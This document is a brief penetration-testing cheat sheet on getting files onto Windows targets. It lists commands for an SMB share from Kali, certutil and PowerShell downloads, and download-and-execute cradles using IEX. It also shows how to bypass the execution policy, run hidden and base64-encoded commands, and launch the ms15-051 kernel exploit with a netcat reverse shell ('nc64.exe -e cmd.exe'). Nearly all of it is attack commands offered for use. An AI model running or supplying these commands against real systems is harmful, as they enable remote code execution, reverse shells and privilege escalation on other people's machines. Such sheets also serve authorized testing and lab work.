# Transfer Files

# SMB Share

# Start SMB Share
sudo python3 smbserver.py -smb2support [my share name] [directory to share]

# Copy files from the share
Copy-Item -Path \\\share\winpeas.exe -Destination C:\windows\temp\ -Force

# Windows can execute files in Kali SHARE
Example of kernel exploit below 
\\\share\ms15-051x64.exe "\\\share\nc64.exe -e cmd.exe 443"

# Powershell

# Download File
certutil.exe -urlcache -split -f C:\\Users\\Public\\nc64.exe
IWR -uri -outfile C:\backup\evil.exe

# Download and run reverse shell
powershell "IEX(New-Object Net.WebClient).downloadString('')"
(new-object net.webclient).downloadfile('', 'C:\Windows\Temp\JuicyPotato.exe')
powershell -c iwr -uri -o c:\users\blake\downloads\wp.exe

# Bypass policy
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('')|iex"

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('')

powershell -W Hidden -nop -noni -enc <base64 text>

# Base64 encoded file

echo "IEX(New-Object Net.WebClient).downloadString('')" |iconv -t UTF-16LE | base64 -w 0

powershell -nop -enc ASDKnxADadaSDASDikA